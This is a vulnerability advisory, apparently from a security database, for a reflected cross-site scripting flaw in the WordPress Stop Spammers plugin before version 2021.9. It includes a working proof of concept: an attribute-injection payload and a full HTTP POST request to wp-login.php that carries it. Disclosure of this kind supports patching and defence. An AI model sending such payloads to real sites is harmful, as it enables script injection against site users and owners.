Lucene search
Hosein vitaWPEX-ID:5E7ACCD6-08DC-4C6E-9D19-73E2D7E97735HistoryApr 08, 2021 - 12:00 a.m.
Stop Spammers < 2021.9 - Reflected Cross-Site Scripting (XSS)
2021-04-0800:00:00
Hosein vita
306
The plugin did not escape user input when blocking requests (such as matching a spam word), outputting it in an attribute after sanitising it to remove HTML tags, which is not sufficient and lead to a reflected Cross-Site Scripting issue.
From an IP not in the Allow List (wp-admin/admin.php?page=ss_allow_list), make a request with a spam word, and add an XSS payload, such as ad" accesskey=X onclick=alert(1) "
An input such as ad">TEST can also be used to prove the injection which will result in TEST" /> being displayed in the page
This can be achieved via the wp-login.php form for example, either in the Username or Password fields.
POST /wp-login.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 148
Connection: close
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Upgrade-Insecure-Requests: 1
log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=Log+In&testcookie=1Related
wpvulndb
wpvulndb
Stop Spammers < 2021.9 - Reflected Cross-Site Scripting (XSS)
2021-04-08 00:00:00
packetstorm
packetstorm
WordPress Stop Spammers 2021.8 Cross Site Scripting
2021-05-19 00:00:00
checkpoint_advisories
checkpoint_advisories
WordPress Stop Spammers Plugin Cross Site Scripting (CVE-2021-24245)
2021-06-01 00:00:00
patchstack
patchstack
prion
prion
Cross site scripting
2021-05-06 13:15:00
zdt
zdt
cve
cve
CVE-2021-24245
2021-05-06 13:15:00
nuclei
nuclei
WordPress Stop Spammers <2021.9 - Cross-Site Scripting
2022-06-02 10:25:19
exploitdb
exploitdb
Related for WPEX-ID:5E7ACCD6-08DC-4C6E-9D19-73E2D7E97735